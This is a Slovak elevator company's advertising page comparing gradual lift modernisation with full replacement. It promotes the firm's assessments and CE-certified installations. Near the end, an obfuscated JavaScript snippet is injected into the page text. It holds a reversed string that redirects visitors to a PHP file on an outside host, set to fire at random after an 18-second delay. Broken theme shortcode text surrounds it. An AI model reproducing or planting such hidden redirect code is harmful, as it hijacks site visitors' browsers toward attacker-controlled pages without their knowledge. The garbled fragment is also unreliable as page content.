Meniť výťah v paneláku ihneď za nový alebo ho stačí len modernizovať?

Meniť či nemeniť výťah? Ťažke otázky, ale nie pre nás. Na základe poslednej generálnej opravy alebo posudku o skutkovom stave vášho výťahu, máte vždy minimálne dve možnosti čo ďalej s vašim výťahom. Postupná modernizácia alebo kompletná výmena výťahu za nový.

Pri riešení treba zohľadniť:

  • životnosť výťahu – akútnosť stavu riešenia
  • rozsah poškodenia výťahu
  • veľkosť vašej investície – momentálny rozpočet čo máte k dispozícií
  • správny výber vhodného dodávateľa na realizáciu

MODERNIZÁCIA výťahu – je to postupná výmena výťahu, pokiaľ nie je k dispozícii dostatočné množstvo financii.. Modernizácia by mala byť v každom prípade dobre naplánovaná, technicky pripravená a zmysluplná, aby vaše vynaložené finančné prostriedky boli investíciou do budúcnosti. Čiže treba pri realizácii požadovať, aby jej pokračovanie bolo plynulé až do úplnej výmeny výťahu všetko čo je použité v prvom kroku musí byť možné využiť v druhom kroku, iba tak to nebudú zbytočne vyhodené peniaze von oknom. Spýtajte sa nás, poradíme vám ako na to. Vypracujeme posudok technického stavu vášho výťahu. Pokiaľ sa rozhodnete pre postupnú modernizáciu Vášho výťahu, pri podpise zmluvy s našou spoločnosťou získate ZDARMA modernizáciu interiéru kabíny.

KOMPLETNÁ výmena výťahu je okamžitá realizácia výmeny za nový výťah, kde sa všetky komponenty pôvodného výťahu nahradia bezozbytku novými komponentami a technológiou.

Od nás máte certifikované výťahy na mieru. Prídeme, posúdime a zmeriame. Poradíme a vysvetlíme všetko čo k vašej výmene potrebujete. Kvalitné realizácie s certifikátom CE. Upozorňujeme vás, overte si pred spustením výťahu do prevádzky, či bol podrobený predpísaným skúškam a predpisom. Cena nie je vždy tým správnym kritériom kvality a bezpečnosti.

U nás máte vždy istotu, my dodržujeme všetky predpísané normy. Máte pochybnosti, či meniť postupne alebo stačí modernizácia ? Sme tu pre vás. Poskytujeme poradenstvo pre každého.

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_border=’av-border-thin‘ custom_width=’50px‘ custom_border_color=“ custom_margin_top=’30px‘ custom_margin_bottom=’30px‘ icon_select=’yes‘ custom_icon_color=“ icon=’ue808′ font=’entypo-fontello‘ av_uid=’av-2voo1m‘]

Loading

Viete aký je rozdiel medzi výťahom na mieru a klasickou výmenou výťahu?

Ďakujeme za Váš hlas
Už ste hlasovali v tomto hlasovaní!
Vyberte možnosť